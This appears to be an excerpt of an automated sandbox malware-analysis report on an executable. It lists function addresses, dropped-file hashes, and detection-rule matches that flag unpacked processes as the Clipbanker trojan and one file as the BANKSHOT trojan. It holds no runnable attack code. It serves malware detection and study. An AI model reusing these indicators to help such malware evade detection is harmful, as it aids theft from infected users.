Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0041E690	5_2_0041E690
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040F730	5_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00481920	5_2_00481920
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00419F90	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D050	5_2_0050D050
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00405057	5_2_00405057
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040C070	5_2_0040C070
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0042F010	5_2_0042F010
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D008	5_2_0050D008
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00408030	5_2_00408030
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D028	5_2_0050D028
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004070E0	5_2_004070E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D090	5_2_0050D090
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D0A8	5_2_0050D0A8
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00410160	5_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004021C0	5_2_004021C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004C9343	5_2_004C9343
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0044237E	5_2_0044237E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00405447	5_2_00405447
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00405457	5_2_00405457
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004084C0	5_2_004084C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C4E0	5_2_0050C4E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004344FF	5_2_004344FF
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00449506	5_2_00449506
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0043E5A3	5_2_0043E5A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0044B5B1	5_2_0044B5B1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040A660	5_2_0040A660
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00409686	5_2_00409686
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00406740	5_2_00406740
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00402750	5_2_00402750
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040A710	5_2_0040A710
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00408780	5_2_00408780
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0044D7A1	5_2_0044D7A1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0042C804	5_2_0042C804
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00406880	5_2_00406880
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C960	5_2_0050C960
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C928	5_2_0050C928
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0044D9DC	5_2_0044D9DC
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004069F3	5_2_004069F3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C988	5_2_0050C988
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C9A8	5_2_0050C9A8
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00449A71	5_2_00449A71
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00443B40	5_2_00443B40
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CB78	5_2_0050CB78
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00402B80	5_2_00402B80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00406B80	5_2_00406B80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00409CF9	5_2_00409CF9
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0044ACFF	5_2_0044ACFF
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040DD40	5_2_0040DD40
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00427D6C	5_2_00427D6C
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CD60	5_2_0050CD60
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040BDC0	5_2_0040BDC0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CDF0	5_2_0050CDF0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00409DFA	5_2_00409DFA
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CE58	5_2_0050CE58
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0042CE51	5_2_0042CE51
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00406EE0	5_2_00406EE0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00409F76	5_2_00409F76
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00420F30	5_2_00420F30
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CF28	5_2_0050CF28
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CFC0	5_2_0050CFC0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00449FE3	5_2_00449FE3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CF90	5_2_0050CF90

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe 9B0DA8AB12D9CA7CC05B9553BA3D3407E4EE38CB9A74298096022B2B46563FB2

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00428C81 appears 79 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 004547A0 appears 108 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 0042F7C0 appears 172 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 0044F23E appears 108 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00428520 appears 144 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00425007 appears 32 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 05DB0160 appears 50 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 05DF0160 appears 50 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 05DE8EC0 appears 57 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 05DA8EC0 appears 57 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00454E50 appears 77 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: String function: 0044F26C appears 41 times

Source: sIQywRNC5M.exe, 00000000.00000002.2029705530.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000001.00000000.2027055880.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000001.00000003.2042290921.00000000030B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000004.00000002.2052100419.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000005.00000002.2547375866.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires0 vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000005.00000000.2049593758.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000005.00000003.2544183942.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires0 vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000005.00000003.2543573711.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires0 vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000006.00000002.2072220466.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000007.00000000.2069543451.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000015.00000002.2541785740.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000016.00000000.2536276932.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000018.00000002.2700103020.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe, 00000019.00000000.2693825164.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe
Source: sIQywRNC5M.exe	Binary or memory string: OriginalFilenameFirez( vs sIQywRNC5M.exe

Source: sIQywRNC5M.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.mstsca.exe.8f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.mstsca.exe.8f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 28.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.mstsca.exe.9615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
